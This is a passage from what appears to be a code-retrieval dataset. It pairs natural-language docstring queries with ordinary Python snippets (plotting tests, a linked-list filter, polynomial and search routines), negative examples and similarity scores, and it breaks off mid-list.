self.datadir,\n 'monol_test_E3-50_cpds_rebin1.03' + HEN_FILE_EXTENSION)\n hen.plot.main([pname, cname, '--noplot', '--xlog', '--ylog',\n '-o', 'dummy.qdp'])\n hen.plot.main([pname, '--noplot', '--axes', 'power', 'power_err',\n '--xlin', '--ylin',\n '-o', 'dummy.qdp'])", "def test_arguments_7(self):\n fig = plt.figure()\n ax = fig.add_subplot(projection='ternary')\n tn0, tn1, tn2 = get_spiral()\n ax.plot(tn0, tn1, tn2, 'C3:', tn1, tn2, tn0)", "def test():\n data1 = resources_vs_time(0.0, 50)\n data2 = resources_vs_time(1.0, 10)\n data3 = resources_vs_time(2.0, 10)\n data4 = resources_vs_time(0.5, 10)\n print data1\n simpleplot.plot_lines(\"Growth\", 600, 600, \"time\", \"total resources\", [data1])", "def showPlot1(): \n raise NotImplementedError", "def test_plot_lm(models, kwargs):\n idata = models.model_1\n if \"constant_data\" not in idata.groups():\n y = idata.observed_data[\"y\"]\n x1data = y.coords[y.dims[0]]\n idata.add_groups({\"constant_data\": {\"_\": x1data}})\n idata.constant_data[\"x1\"] = x1data\n idata.constant_data[\"x2\"] = x1data\n\n axes = plot_lm(idata=idata, y=\"y\", y_model=\"eta\", xjitter=True, **kwargs)\n assert np.all(axes)", "def builtin_plot(self, **kwargs):\n self.gp.plot(**kwargs)\n return", "def show_plot() :\n logger.info(\"Show plot\")\n pylab.axis('equal')\n pylab.xlabel(\"Longitud\")\n pylab.ylabel(\"Latitud\")\n pylab.grid(True)\n pylab.title(\"Product tiles and product source\")\n pylab.show()", "def test_plot_csv(self, script_runner: ScriptRunner, tmp_path: Path) -> None:\n outfile = tmp_path.joinpath(\"projection.png\")\n logfile = tmp_path.joinpath(\"plot.log\")\n result = script_runner.run(\n \"qaa\",\n \"plot\",\n \"-i\",\n PROJ,\n \"-o\",\n outfile.as_posix(),\n \"-l\",\n logfile.as_posix(),\n \"--pca\",\n \"--verbose\",\n )\n assert result.success\n assert logfile.exists()\n assert outfile.exists()\n assert outfile.stat().st_size > 0", "def test_data(fig_ref, fig_test):\n tn0, tn1, tn2 = get_spiral()\n\n ax = fig_test.add_subplot(projection='ternary')\n data = {'tn0': tn0, 'tn1': tn1, 'tn2': tn2}\n ax.plot('tn0', 'tn1', 'tn2', data=data)\n\n ax = fig_ref.add_subplot(projection='ternary')\n ax.plot(tn0, tn1, tn2)", "def test_create_plot(self):\n create_plot(\n dataset_name='ds',\n chart_name='My Chart',\n series=[{'column': 1}],\n validate=True\n )\n create_plot(\n dataset_name='ds',\n chart_name='My Chart',\n series=[{'column': 1}],\n xaxis_range='0:10',\n validate=True\n )\n # Have an error raised if values of invalid data type are given\n with self.assertRaises(ValueError):\n create_plot(\n dataset_name='ds',\n chart_name='My Chart',\n series=[{'column': 'abc'}],\n xaxis_range='0:10',\n validate=True\n )\n with self.assertRaises(ValueError):\n create_plot(\n dataset_name='ds',\n chart_name='My Chart',\n series=[{'column': 1, 'label': [], 'range': '0-10'}],\n xaxis_range='0:10',\n validate=True\n )\n # Get dictionary serialization of command arguments. Ensure that we\n # can create a valid command instance from the returned result.\n obj = create_plot(\n dataset_name='ds',\n chart_name='My Chart',\n series=[{'column': 1}],\n xaxis_range='0:10',\n validate=True\n ).arguments.to_list()\n ModuleCommand(\n package_id=plot.PACKAGE_PLOT,\n command_id=plot.PLOT_SIMPLE_CHART,\n arguments=obj,\n packages=PACKAGES\n )\n # Delete a mandatory element from the serialization to ensure that\n # validation fails\n index = -1\n for i in range(len(obj)):\n if obj[i][ARG_ID] == plot.PARA_SERIES:\n index = i\n break\n del obj[i]\n with self.assertRaises(ValueError):\n ModuleCommand(\n package_id=plot.PACKAGE_PLOT,\n command_id=plot.PLOT_SIMPLE_CHART,\n arguments=obj,\n packages=PACKAGES\n )\n # Add an unknown argument to ensure that the validation fails\n obj = create_plot(\n dataset_name='ds',\n chart_name='My Chart',\n series=[{'column': 1}],\n xaxis_range='0:10',\n validate=True\n ).arguments.to_list()\n obj.append(ARG(id='someUnknownLabel', value=''))\n with self.assertRaises(ValueError):\n ModuleCommand(\n package_id=plot.PACKAGE_PLOT,\n command_id=plot.PLOT_SIMPLE_CHART,\n arguments=obj,\n packages=PACKAGES\n )", "def test_simple(make_plots=False):\n # Define the example you want to investigate:\n r1 = GeneralRandom(np.arange(10), np.ones(10), 100)\n r2 = GeneralRandom(np.arange(5), np.ones(5), 20)", "def test_make_plot_log(self):\n print(sys._getframe().f_code.co_name)\n try:\n x = np.arange(0,6)*300000\n y = np.arange(0,6)\n pp.make_plot(x,y,plot_type='d',y_axis_type='log',xticks=[0,1,2,3], yticks=[0,1,2,3])\n except Exception as e:\n raise\n plt.close('all')", "def visualize_test(test_data_full, test_data, thetas):\n fig, ax = plt.subplots()\n ax.scatter(test_data_full[\"Weight\"], test_data_full[\"Height\"], color='blue')\n ax.plot(test_data_full[\"Weight\"], predict(test_data, thetas[-1]), color='red', linewidth=2)\n return fig", "def plot(self):\n\t\tself.plotOfHeatingCurrent().plot()", "def test_init_SEGYPlotter(self):\n fig = plt.figure()\n ax = fig.add_subplot(111)\n splt = SEGYPlotter(ax, self.segy)\n # should inherit from SEGYPlotManager\n for member in inspect.getmembers(SEGYPlotManager):\n self.assertTrue(hasattr(splt, member[0]))\n # should *not* build header lookup table\n self.assertFalse(hasattr(splt, 'sdb'))\n # should attach axes\n self.assertTrue(isinstance(splt.ax, matplotlib.axes.Axes))", "def test_plot_lm_typeerror(models):\n idata1 = models.model_1\n with pytest.raises(TypeError):\n plot_lm(idata=idata1, y=\"y\", num_samples=-1)", "def test_plot_with_axes_or_figure(img_3d_mni):\n figure = plt.figure()\n plot_img(img_3d_mni, figure=figure)\n ax = plt.subplot(111)\n plot_img(img_3d_mni, axes=ax)\n plt.close()", "def test_plot_activation_functions():\n x = np.arange(-2, 2, 0.1)\n for name, f in activation_functions_dict.items():\n plt.plot(x, f(x), label=name)\n plt.title('Numpy activation functions')\n plt.legend()\n if show_plots:\n plt.show()", "def test_overplotting(self):\n arr = self.arr\n out = ternary(arr)\n self.assertTrue(hasattr(out, \"tax\"))\n out2 = ternary(arr, ax=out)\n self.assertTrue(out.tax is out2.tax) # hasn't added a new ternary axis", "def test_plot_ess_local_quantile(models, kind, kwargs):\n idata = models.model_1\n ax = plot_ess(idata, kind=kind, **kwargs)\n assert np.all(ax)", "def test_plot_mesh(self):\n plt.close('all')\n\n #\n # Initialize\n #\n fig, ax = plt.subplots(3,3)\n plot = Plot()\n #\n # Define mesh\n # \n mesh = Mesh.newmesh(grid_size=(2,2))\n mesh.refine() \n mesh.root_node().children[1,1].mark(1)\n mesh.refine(1)\n \n # Plot simple mesh\n ax[0,0] = plot.mesh(ax[0,0], mesh)\n \n #\n # Flag a few cells\n # \n mesh.unmark(nodes=True)\n mesh.root_node().children[0,0].mark(2)\n mesh.root_node().children[1,0].mark(1)\n mesh.root_node().children[1,1].children['SW'].mark(3)\n mesh.root_node().children[1,1].children['NE'].mark(3)\n \n # Color flagged cells\n ax[0,1] = plot.mesh(ax[0,1], mesh, color_marked=[1,2,3], nested=True)\n \n # Plot vertex numbers\n ax[0,2] = plot.mesh(ax[0,2], mesh, vertex_numbers=True)\n \n # Plot edge numbers\n ax[1,0] = plot.mesh(ax[1,0], mesh, edge_numbers=True)\n \n # Plot cell numbers nested off\n mesh.refine(2)\n ax[1,1] = plot.mesh(ax[1,1], mesh, cell_numbers=True)\n \n # Plot cell numbers nested on\n ax[1,2] = plot.mesh(ax[1,2], mesh, cell_numbers=True, nested=True)\n\n # Plot dofs\n element = QuadFE(2,'Q1')\n ax[2,0] = plot.mesh(ax[2,0], mesh, element=element, dofs=True)\n \n # Assign dofs in a nested way\n ax[2,1] = plot.mesh(ax[2,1], mesh, element=element, dofs=True, \\\n nested=True)\n \n # Display only dofs of flagged nodes \n ax[2,2] = plot.mesh(ax[2,2], mesh, element=element, dofs=True, \\\n node_flag=3, nested=True, show_axis=True)", "def test_exercise_2():\n dirname = os.path.dirname(os.path.realpath(__file__))\n df = pd.read_pickle(f\"{dirname}/material/data-consumption-function.pkl\")\n\n def construct_predicted_values(income, alpha, beta, gamma):\n return alpha + beta * income ** gamma\n\n mock_rslt = [-91.1933, 0.5691, 1.0204]\n income = df[\"realgdp\"].values\n df[\"realcons_pred\"] = construct_predicted_values(income, *mock_rslt)\n\n x = df.index.get_level_values(\"Year\")\n fig, ax = plt.subplots()\n ax.plot(x, df[\"realcons_pred\"], label=\"Predicted\")\n ax.plot(x, df[\"realcons\"], label=\"Observed\")", "def test_TimeSeries_repr():", "def test_get_axes():\n fig, axs = plt.subplots()\n assert all(\n isinstance(ax, mpl.axes.Axes)\n for ax in prettypyplot.tools.get_axes(axs)\n )\n assert all(\n isinstance(ax, mpl.axes.Axes)\n for ax in prettypyplot.tools.get_axes(None)\n )\n with pytest.raises(TypeError):\n prettypyplot.tools.get_axes(fig)", "def tearDown(self):\n\n self.plot = None", "def test_plt_residual_offsets():\n\n ta = WATA()\n wata_data = define_testdata()\n ta.source = ColumnDataSource(data=wata_data)\n ta.add_time_column()\n ta.setup_date_range()\n result = ta.plt_residual_offsets()\n\n assert bokeh_plot_type == type(result)" ]
[ "0.7648768", "0.75122124", "0.72958684", "0.7275574", "0.72454226", "0.7222819", "0.7141116", "0.70794994", "0.7067178", "0.70542", "0.70453763", "0.7018102", "0.70058864", "0.6963196", "0.6957051", "0.6953664", "0.6890608", "0.6844756", "0.6818328", "0.67763114", "0.67755586", "0.6773841", "0.6773796", "0.677116", "0.6737117", "0.6737117", "0.6677756", "0.66698146", "0.66398406", "0.66269505", "0.6617088", "0.661532", "0.6611782", "0.6592362", "0.65833724", "0.6566148", "0.6514988", "0.6509339", "0.64867264", "0.6482838", "0.6481102", "0.64647096", "0.6459486", "0.64285135", "0.64272666", "0.6424308", "0.64175576", "0.64130807", "0.6380469", "0.6369792", "0.63609946", "0.63561875", "0.63536805", "0.635238", "0.63503903", "0.6346156", "0.63450265", "0.63381237", "0.6327611", "0.6327401", "0.6320235", "0.63169485", "0.63132346", "0.6308366", "0.62994075", "0.6293413", "0.6291273", "0.6288597", "0.62739134", "0.6273173", "0.6269536", "0.6258541", "0.62546194", "0.6254519", "0.6243024", "0.6242218", "0.62260467", "0.62218934", "0.6213286", "0.6207692", "0.620486", "0.62044483", "0.6200011", "0.61970687", "0.61862385", "0.6184902", "0.61738515", "0.6168781", "0.6162563", "0.61517483", "0.6138071", "0.6135795", "0.6135387", "0.61316156", "0.61310554", "0.61269027", "0.6112256", "0.61096996", "0.6108132", "0.61012244" ]
0.6778257
19
Return elements e of s for which f(e) is true.
def filter_link(f, s): if s is Link.empty: return s else: filtered = filter_link(f, s.rest) if f(s.first): return Link(s.first, filtered) else: return filtered
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def selectElements(self, f, elements):\n if isinstance(elements, types.StringTypes):\n m = self.elementIndex(elements)\n return f[m]\n if elements:\n fs = []\n k = 0\n for s in elements:\n k = self.elementIndex(s)\n fs.append(f[k])\n return asarray(fs)\n else:\n return asarray(f)", "def filter(self, ffun):\n # BEGIN\n lst = []\n for item in WordSet(self.text).words():\n # if len(item) == len(ffun):\n # lst.append(item)\n if ffun(item) == True:\n lst.append(item)\n return lst\n\n # END", "def fn(p, s):\n ss = iter(s)\n return all(ch in ss for ch in p)", "def filter(self, fn: Callable[[Tuple[K, List[V]]], bool]) -> Iterator[Tuple[K, List[V]]]:\n return (entry for entry in iter(self) if fn(entry))", "def subresultants(f, g):\n lev, dom, per, F, G = f.unify(g)\n R = dmp_subresultants(F, G, lev, dom)\n return map(per, R)", "def simple_filter(f, l):\n # a list comprehension with an 'if' clause goes the job nicely\n return [ item for item in l if f(item) ]", "def find(f, seq):\n for item in seq:\n if f(item): \n return item", "def find(function, iterable):\n for x in iterable:\n if function(x) == True:\n return x", "def conj(fs):\n def feature(s, i):\n return all(f(s, i) for f in fs)\n return feature", "def split_cond(f, iterable):\n split_point = [i for i, e in enumerate(iterable) if f(e)]\n split_point += [len(iterable)]\n return [iterable[i:j] for i, j in zip(split_point[:-1], split_point[1:])]", "def apply_to_all_link(f, s):\n if s == empty:\n return s\n else:\n return link(f(first(s)), apply_to_all_link(f, rest(s)))", "def simple_filter_2(f, l):\n # alternative implementation: the same as above, but without comprehension.\n filtered_l = []\n for item in l:\n if f(item):\n filtered_l.append(item)\n return filtered_l\n # I think the list comprehension is not only shorter, but also more\n # readable.", "def filter(function, iterable):\n\n if function is bool:\n return [x for x in iterable if x]\n\n return [x for x in iterable if function(x)]", "def filter_(f: Callable[[A], Maybe[bool]], iterable: Iterable[A]\n ) -> Maybe[Iterable[A]]:\n return cast(Maybe[Iterable[A]], filter_m_(Just, f, iterable))", "def s2f(sents,i,f,freq):\n return [w2f(sents,i,j,f,freq) for j in range(len(sents[i]))]", "def eval_f(f, xs):\n l = []\n for x in xs:\n l.append(f(x))\n return l", "def cfilter(func,iterable):\n result = []\n\n for i in iterable:\n\n if func(i) == True:\n result.append(i)\n\n return result", "def filtern(func: Callable, iterable: Iterable):\n return next(filter(func, iterable))", "def inverse(f):\n return lambda y: search(lambda x: f(x) == y)", "def filter(self, fn: Callable[[Tuple[K, List[V]]], bool]) -> Iterator[Tuple[K, List[V]]]:\n raise NotImplementedError", "def AND(r, s):\n return lambda l, i: r(l, i) and s(l, i)", "def filter(self, op):\n def op_filter(seqs):\n r = [s for s in seqs if op(s)]\n if len(r) == 0:\n return None\n else:\n return r\n return self.element_wise(op_filter)", "def nextf(f, offset=1):\n def feature(s, i):\n i += offset\n return i < len(s) and f(s, i)\n return feature", "def f_ite(s, a, b):\n f = ITE(s, a, b).factor()\n return f if f in B else f.factor()", "def F(graph):\n return [p for p in graph if set(graph.neighbors(p)) in triads(p)]", "def satisfiesF(L):\n # Your function implementation here\n fS = []\n newL = []\n for element in L:\n fS.append(f(element))\n\n for idx in range(len(fS)):\n if not fS[idx]:\n L[idx] = '!@#'\n\n for idx in range(len(L)):\n try:\n L.remove('!@#')\n except:\n break;\n\n return len(L)", "def every(lst, fn):\n return reduce(lambda acc, elem: acc and fn(elem), lst, True)", "def filtered(self, func):\n return PSetList(list(filter(func, self.sets)))", "def splitCorrect(self, f):\n return self.split(lambda t,l: t.evaluateFormulaOnTrace(f)==l)", "def multi_score(self, r, s, f):\n return [None] if r is None else [0.0] if s is None else [f(x, y)\n for y in self.ensure_list(s)\n for x in self.ensure_list(r)]", "def ft_filter(fnct, tab):\n res = []\n for i in tab:\n if fnct:\n if fnct(i):\n res.append(i)\n else:\n if i:\n res.append(i)\n return res", "def filter(self, function):\n return FunctionalWrapper(filter(function, self.data))", "def my_filter(function,lst):\n return list(x for x in lst if function(x))", "def custom_filter(function, iterable):\n map_list = []\n\n for i in iterable:\n if function(i):\n map_list.append(i)\n\n return map_list", "def golden_section_search(f, a, b, n=10):\n ret = [(a,b)]\n t = (math.sqrt(5) - 1) / 2\n x1 = a + ( 1 - t ) * ( b - a )\n f1 = f(x1)\n x2 = a + t * ( b - a )\n f2 = f(x2)\n for i in range(n):\n print(\"f(x1): \" + str(f1))\n print(\"f(x2): \" + str(f2))\n if(f1 > f2):\n a = x1\n x1 = x2\n f1 = f2\n x2 = a + t*(b-a)\n f2 = f(x2)\n ret.append((a,b))\n else:\n b = x2\n x2 = x1\n f2 = f1\n x1 = a + (1-t)*(b-a)\n f1 = f(x1)\n ret.append((a,b))\n return ret", "def search(f):\n x = 0\n while not f(x):\n x += 1\n return x", "def bfs_target(graph, s, e):\n queue = [s]\n visited = [s]\n find = False\n while len(queue) > 0:\n vertex = queue.pop(0)\n nodes = graph[vertex]\n for n in nodes:\n if n not in visited:\n queue.append(n)\n visited.append(n)\n if n == e:\n find = True\n break\n if find:\n break\n return visited", "def skelmrec(f, B=None):\n from numpy import ravel\n if B is None: B = secross()\n y = binary(intersec(f, 0))\n for r in xrange(f.max(),1,-1):\n y = dilate(union(y,binary(f,r)), B)\n y = union(y, binary(f,1))\n return y", "def filter_reads(f, condition, riter):\n for r in riter:\n # TODO: looks like we don't need 'fpass'\n new_r = tuple(dict(mate, fpass=f(mate) and mate['fpass']) for mate in r)\n if condition(tuple(mate['fpass'] for mate in new_r)):\n yield new_r", "def evaluate(f, assignment):\n if 'v' in f:\n fs = f.split('v')\n return any(evaluate(f, assignment) for f in fs) \n if '&' in f:\n fs = f.replace('(','').replace(')','').split('&')\n return all(evaluate(f, assignment) for f in fs)\n if '=' in f:\n fs = f.replace('(','').replace(')','').split('=')\n evs = [evaluate(f, assignment) for f in fs]\n return all(evs) or not any(evs)\n if '>' in f:\n prefix, last = f.replace('(','').replace(')','').rsplit('>', 1)\n return not evaluate(prefix, assignment) or evaluate(last, assignment)\n if f.startswith('~'):\n return not assignment[f[1]]\n return assignment[f]", "def fancier_uniquer(seq, f, p):\n bunches = {}\n for index, item in enumerate(seq):\n marker = f(item)\n bunches.setdefault(marker, []).append((index, item))\n auxlist = [p(candidates) for candidates in bunches.values()]\n auxlist.sort()\n return [item for index, item in auxlist]", "def d2f(sents,f,freq):\n return [s2f(sents,i,f,freq) for i in range(len(sents))]", "def ea_equivalent_permutation_mappings(f, spaces=None):\n N = int(log(len(f), 2))\n mask = sum((1 << i) for i in range(0, N))\n if spaces == None:\n spaces = get_lat_zeroes_spaces(f)\n result = []\n for V in spaces:\n if thickness(V, N) == N:\n L_lut = [-1 for x in range(0, 2**N)]\n full_space = linear_span(V)\n for x in full_space:\n L_lut[x & mask] = x >> N\n if -1 in L_lut:\n raise Exception(\"Problem in EA-equivalent mapping\")\n else:\n result.append(\n linear_function_lut_to_matrix(L_lut).transpose()\n )\n return result", "def fval_function(sN, weight):\r\n # IMPLEMENT\r\n\r\n # Many searches will explore nodes (or states) that are ordered by their f-value.\r\n # For UCS, the fvalue is the same as the gval of the state. For best-first search, the fvalue is the hval of the state.\r\n # You can use this function to create an alternate f-value for states; this must be a function of the state and the weight.\r\n # The function must return a numeric f-value.\r\n # The value will determine your state's position on the Frontier list during a 'custom' search.\r\n # You must initialize your search engine object as a 'custom' search engine if you supply a custom fval function.\r\n\r\n\r\n return (1 - weight) * sN.gval + weight * sN.hval", "def finite_difference(f, p, h):\n tweaker = FunctionTweak(f, h)\n tweaked_funcs = tweaker(np.atleast_2d(p))\n main_func = tweaked_funcs[0]\n\n def finite_func(t):\n list_of_diffs = [(tweaked_func(t) - main_func(t))/h\n for tweaked_func in tweaked_funcs[1:]]\n return np.column_stack(list_of_diffs)\n\n return finite_func", "def find(f, seq):\n for item in seq:\n if f(item): \n return item\n\n \"\"\"\n Example usage of iterate: \n >>> c = []; \\\n c.append(node(0.5,1,'a')); \\\n c.append(node(0.25,2,'b')); \\\n c.append(node(0.125,3,'c')); \\\n c.append(node(0.125,4,'d')); \\\n iterate(c) ; reportcode(c) # doctest: +NORMALIZE_WHITESPACE\n #Symbol Count Codeword\n a (0.5) 1\n b (0.25) 01\n c (0.12) 000\n d (0.12) 001\n \"\"\"", "def intersect_sets(S):\n res = S[0]\n for s in S:\n res &= s\n return res", "def __get_endpoints(self, f=None):\n if f is None:\n f = _make_callable(self.e)\n a, b = self.expr_domain\n fa, fb = f(a), f(b)\n if self.domain is not None:\n if (fb-fa) * (self.domain[1]-self.domain[0]) < 0:\n # order of values in domain is reversed w.r.t. function slope\n fa, fb = reversed(self.domain)\n else:\n fa, fb = self.domain\n return fa, fb", "def predicate(f):\n wrapper = Predicate(f)\n update_wrapper(wrapper, f)\n return wrapper", "def apply_all_link(f, s):\n assert is_link(s), 's should be a linked list'\n if s == empty:\n return s\n else:\n return link(f(first(s)), apply_all_link(f, rest(s)))", "def affine_equivalence(f, g):\n if len(f) != len(g):\n raise \"f and g are of different dimensions!\"\n table_f = defaultdict(list)\n table_c = defaultdict(int)\n for c in range(0, len(f)):\n f_c = le_class_representative([oplus(f[x], c) for x in range(0, len(f))])\n d = hash_sbox(f_c)\n table_f[d] = f_c\n table_c[d] = c\n rs = []\n a = -1\n b = -1 \n for c in range(0, len(f)):\n g_c = le_class_representative([g[oplus(x, c)] for x in range(0, len(f))])\n d = hash_sbox(g_c)\n if d in table_c.keys():\n a = c\n b = table_c[d]\n rs = g_c\n break\n if a == -1:\n return []\n l_f = linear_equivalence([oplus(f[x], b) for x in range(0, len(f))],\n rs)\n A_f, B_f = l_f[0], l_f[1]\n l_g = linear_equivalence([g[oplus(x, a)] for x in range(0, len(f))],\n rs)\n A_g, B_g = l_g[0], l_g[1]\n A = A_g.inverse() * A_f\n B = B_f * B_g.inverse()\n a = apply_bin_mat(a, A.inverse())\n return [A, a, B, b]", "def sqf_list_include(f, all=False):\n factors = dmp_sqf_list_include(f.rep, f.lev, f.dom, all=all)\n return [ (f.per(g), k) for g, k in factors ]", "def fval_function(sN, weight):\n#IMPLEMENT\n \n #Many searches will explore nodes (or states) that are ordered by their f-value.\n #For UCS, the fvalue is the same as the gval of the state. For best-first search, the fvalue is the hval of the state.\n #You can use this function to create an alternate f-value for states; this must be a function of the state and the weight.\n #The function must return a numeric f-value.\n #The value will determine your state's position on the Frontier list during a 'custom' search.\n #You must initialize your search engine object as a 'custom' search engine if you supply a custom fval function.\n return 0", "def greedy_schedule(s, f, verbose=False):\n X = [False for p in range(n)]\n a = [(s[i], f[i]) for i in range(n)]\n count = 1\n X[count] = 1\n for i in range(2, n):\n if s[i] > f[X[count]]:\n count += 1\n X[count] = i\n\n \"\"\"after this loop, an entry in X will contain either the start time\n of a task (denoting that we should use it) or it will contain False,\n denoting that we should skip it.\"\"\"\n if verbose:\n set_of_classes = set([])\n for item in X:\n if item:\n set_of_classes.add(item)\n print set_of_classes", "def sqf_part(f):\n return f.per(dmp_sqf_part(f.rep, f.lev, f.dom))", "def mapf( f, C ):\n return (f(x) for x in C)", "def solution(s):", "def filter(self, func):\r\n\r\n d = self.data\r\n f = []\r\n for i in d:\r\n if func(i):\r\n f.append(i)\r\n return Records(f)", "def extract_strings(f):\n strings = re.findall(strregex,f)\n return strings", "def ft_filter(function_to_apply, list_of_inputs):\n if not callable(function_to_apply):\n exit(\"First param should be a Function\")\n try:\n object_iter = iter(list_of_inputs)\n except TypeError:\n exit(\"Second Argument must be iterable\")\n lst = []\n for item in list_of_inputs:\n if function_to_apply(item) == True: \n lst.append(item)\n return lst", "def filter(iteratee, seq):\n return _filter(fnc.iteratee(iteratee), seq)", "def get_paths_for_flow(F, s, f):\n links = [((u, v), split_ratio) \n for (flow_id, u, v), split_ratio in F.items() \n if flow_id == f and u == s and split_ratio > 0.001]\n return links", "def get_paths_for_flow(F, s, f):\n links = [((u, v), split_ratio) \n for (flow_id, u, v), split_ratio in F.items() \n if flow_id == f and u == s and split_ratio > 0.001]\n return links", "def brute_force_search(f, fp_factors, q):\n factors = []\n d, r = 1, len(fp_factors)\n while 2*d <= r:\n found, combination = find_combination(f, d, fp_factors, q)\n if found:\n factors.append(found)\n for picked in combination:\n fp_factors.remove(picked)\n f = f.pseudo_floordiv(found).primitive_part()\n r -= d\n else:\n d += 1\n factors.append(f.primitive_part())\n return factors", "def keep_if_link(f, s):\n assert is_link(s)\n if s == empty:\n return s\n else:\n kept = keep_if_link(f, rest(s))\n if f(first(s)):\n return link(first(s), kept)\n else:\n return kept", "def algo_4_3(sf,FV):\n F = set()\n V = FV.keys()\n \n for s in sf:\n if isVariable(s, V):\n if EMPTY_SYMBOL_UNI in FV[s]:\n F |= (FV[s]- set([EMPTY_SYMBOL_UNI]))\n else:\n F |= FV[s]\n break\n else:\n assert s[0] == s[-1]\n assert s[0] == \"'\" or s[0] == '\"'\n\n s = s[1:-1] #字面量 去除引号\n F.add(s[0]) #取第一个符号作为首终结符\n break\n return F", "def filter(self, func: Callable[[T], bool]) -> 'List[T]':\n return [v for v in self.array if func(v)]", "def filter_list(f):\n\n def new_function(*args: Union[List[Tuple[str, bool]], Any], **kwargs: Any):\n try:\n return '\\n'.join([file for file, is_saved in\n {k: v for d in f(*args, **kwargs)\n for k, v in d.items()}.items() if not is_saved])\n except AttributeError:\n return ''\n\n return new_function", "def keep_if_link(f, s):\n assert is_link(s)\n if s == empty:\n return s\n else:\n kept = keep_if_link(f, rest(s))\n if f(first(s)):\n return link(first(s), kept)\n else:\n return kept", "def keep_if_link(f, s):\n assert is_link(s)\n if s == empty:\n return s\n else:\n kept = keep_if_link(f, rest(s))\n if f(first(s)):\n return link(first(s), kept)\n else:\n return kept", "def filter(self, func=bool):\n return _(filter(func, self._))", "def sub(f, g):\n lev, dom, per, F, G = f.unify(g)\n return per(dmp_sub(F, G, lev, dom))", "def filter(self, func):\n self._sets.filter(key=func)", "def find(iteratee, seq):\n for item in filter(iteratee, seq):\n return item", "def zzX_eval_list(f, A):\n def rec_eval(g, l, L):\n if l == L:\n return zzx_eval(g, A[-1])\n else:\n h = [ rec_eval(h, l+1, L) for h in g ]\n\n if l <= L - len(A):\n return h\n else:\n return zzx_eval(h, A[-L+l-1])\n\n if not A:\n return f\n\n L = poly_level(f)\n\n if zzX_zero_p(f):\n return zzX_zero(L - len(A))\n\n e = rec_eval(f, 1, L)\n\n if L == len(A):\n return e\n else:\n return zzX_strip(e)", "def shear_tensor(self, f):\n shear = self.einsum(\"qa,qb->qab\", [self.e, self.e])\n shear = self.einsum(\"q,qab->ab\", [f, shear])\n return shear", "def filter(self, fn):\r\n\t\treturn FilterProjectedList(self, [fn])", "def resultant(f, g):\n lev, dom, per, F, G = f.unify(g)\n return per(dmp_resultant(F, G, lev, dom), lower=True)", "def eval(f, a, j=0):\n return f.per(dmp_eval_in(f.rep, f.dom.convert(a), j, f.lev, f.dom), lower=True)", "def local_func(f, t, x, w):\n x_func = np.zeros_like(t, dtype='f')\n for i, jd in enumerate(t.jd):\n sel = (t.jd >= (jd - w)) & (t.jd <= (jd + w))\n x_func[i] = f(x[sel])\n return x_func", "def get_inner_quantifiers(f):\n inner = f\n while is_quantifier(inner.root):\n quantifiers.append((inner.root, inner.variable))\n inner = inner.predicate\n return inner", "def selectSpecies(self, f, species):\n\n if isinstance(species, types.StringTypes):\n k = self.speciesIndex(species)\n return f[k]\n elif species:\n fs = []\n k = 0\n for s in species:\n k = self.speciesIndex(s)\n fs.append(f[k])\n return asarray(fs)\n else:\n return asarray(f)", "def accessible(g, s):\n\tacc = set()\n\tacc.add(s)\n\tlist = [s]\n\twhile len(list) > 0:\n\t\tx = list[0]\n\t\tlist = list[1 : ]\n\t\tfor y in g.parseNout(x):\n\t\t\tif y not in acc:\n\t\t\t\tacc.add(y)\n\t\t\t\tlist.append(y)\n\treturn acc", "def LineSearchXS(F, x, s, dx, ds, L, U, iterates):\n \n L_val = F(x + dx * L, s + ds * L)\n U_val = F(x + dx * U, s + ds * U)\n \n if iterates <= 0:\n if L_val < U_val:\n return L\n else:\n return U\n \n \n if L_val < U_val:\n return LineSearchXS(F, x, s, dx, ds, L, (U + L) / 2, iterates - 1)\n else:\n \treturn LineSearchXS(F, x, s, dx, ds, (U + L) / 2, U, iterates - 1)", "def filter(s, F, dt, nf):\n S = np.fft.fft(s, n=nf)\n S_f = np.multiply(S, F)*dt\n s_f = np.real(np.fft.ifft(S_f, n=nf))\n return s_f", "def f2E(f):\n E=c['h']*f*u['eV']\n return E", "def get_bfs(self, s):\n # create a queue for BFS\n queue = []\n # mark all the vertices as not visited\n visited = [False] * (len(self.graph))\n # mark the start node as visited and enqueue it\n visited[s] = True\n queue.append(s)\n results = []\n\n while queue:\n # dequeue a vertex from queue and append to results.\n p = queue.pop(0)\n results.append(p)\n # get all adjacent vertices of the dequeued vertex s,\n # and for any unvisited adjacent, mark it visited and enqueue it.\n for v in self.graph[p]:\n if visited[v] is False:\n visited[v] = True\n queue.append(v)\n\n return results", "def satisfiesF(L):\n # Your function implementation here\n i = 0\n while i < len(L):\n if not f(L[i]):\n L.remove(L[i])\n else:\n i += 1\n return len(L)", "def x(self, s, f):\n return self._x_rasters[s][f]", "def skelm(f, B=None, option=\"binary\"):\n from string import upper\n from numpy import asarray\n if B is None: B = secross()\n assert isbinary(f),'Input binary image only'\n option = upper(option)\n k1,k2 = limits(f)\n y = gray(intersec(f, k1),'uint16')\n iszero = asarray(y)\n nb = sesum(B,0)\n for r in xrange(1,65535):\n ero = erode(f,nb)\n if isequal(ero, iszero): break\n f1 = openth( ero, B)\n nb = sedilate(nb, B)\n y = union(y, gray(f1,'uint16',r))\n if option == 'BINARY':\n y = binary(y)\n return y", "def friend(x):\n return [f for f in x if len(f) == 4]", "def all_terms(f):\n return dmp_all_terms(f.rep, f.lev, f.dom)", "def zzX_content(f):\n cont = poly_LC(f)\n\n for g in f[1:]:\n cont = zzX_gcd(cont, g)\n\n if zzX_one_p(cont):\n break\n\n return cont", "def _extract_feature(self,f):\n if callable(f): \n return f()\n elif type(f) == tuple:\n return f[0](*list(f[1:]))", "def find_all(s, t):\n offset = 0\n starts = []\n start = s.find(t, offset)\n while start != -1:\n starts.append(start + 1) # Uses one-based indexing, as Pfam does.\n offset = start + 1\n start = s.find(t, offset)\n return starts", "def zassenhaus(f):\n # keep leading coefficient\n lf = f.leading_coefficient()\n\n # p-adic factorization\n p, fp_factors = padic_factorization(f)\n if len(fp_factors) == 1:\n return [f]\n\n # purge leading coefficient from factors\n for i,g in enumerate(fp_factors):\n if g.degree() == 0:\n del fp_factors[i]\n break\n\n # lift to Mignotte bound\n blm = upper_bound_of_coefficient(f)\n bound = p**(arith1.log(2*blm,p)+1)\n\n # Hensel lifting\n lf_inv_modq = intresidue.IntegerResidueClass(lf, bound).inverse()\n fq = f.coefficients_map(lambda c: (lf_inv_modq*c).minimumAbsolute()) # fq is monic\n fq_factors, q = hensel.lift_upto(fq, fp_factors, p, bound)\n\n return 